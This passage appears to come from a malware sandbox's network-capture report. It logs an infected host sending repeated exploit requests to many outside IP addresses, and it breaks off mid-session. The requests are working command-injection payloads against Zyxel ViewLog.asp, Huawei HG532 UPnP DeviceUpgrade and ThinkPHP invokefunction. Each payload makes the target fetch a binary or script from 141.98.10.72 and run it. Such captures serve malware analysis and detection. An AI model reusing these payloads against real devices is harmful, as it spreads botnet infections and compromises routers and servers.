                                                            Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.20</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            112192.168.2.235093662.29.15.1598080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:05.221380949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            113192.168.2.235903494.121.46.1268080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:05.224783897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            114192.168.2.234058495.131.73.1498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:05.492391109 CET140INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 0
                                                            Connection: close
                                                            Cache-control: no-cache


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            115192.168.2.2350368197.49.60.13137215
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:05.512317896 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Feb 14, 2024 09:28:05.787224054 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            116192.168.2.2342412112.221.197.2680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:06.593965054 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:06.902632952 CET270INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 113
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:29:05 GMT
                                                            Server: httpd
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            117192.168.2.234472695.110.223.14480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:06.811522007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:07.938261032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:09.282059908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:11.969697952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:17.345024109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:28.095474958 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:49.340445042 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:32.342531919 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            118192.168.2.235280295.9.78.22780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:06.861419916 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:07.129030943 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:28:06 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            119192.168.2.235868695.235.214.17180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.082880020 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            120192.168.2.234970295.58.238.12780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.186237097 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:07.479631901 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:28:07.479721069 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            121192.168.2.233906695.241.232.2388080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.738570929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:08.930152893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            122192.168.2.234899894.62.185.818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.738648891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:07.970376015 CET433INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 19:11:55 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            123192.168.2.234940494.120.218.2438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.739989996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            124192.168.2.234319294.121.79.1018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.741858006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            125192.168.2.233652694.121.17.338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:07.986355066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            126192.168.2.235787431.136.226.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:08.173619032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:08.802346945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:10.050061941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.737580061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:17.856873035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:27.839564085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.340459108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
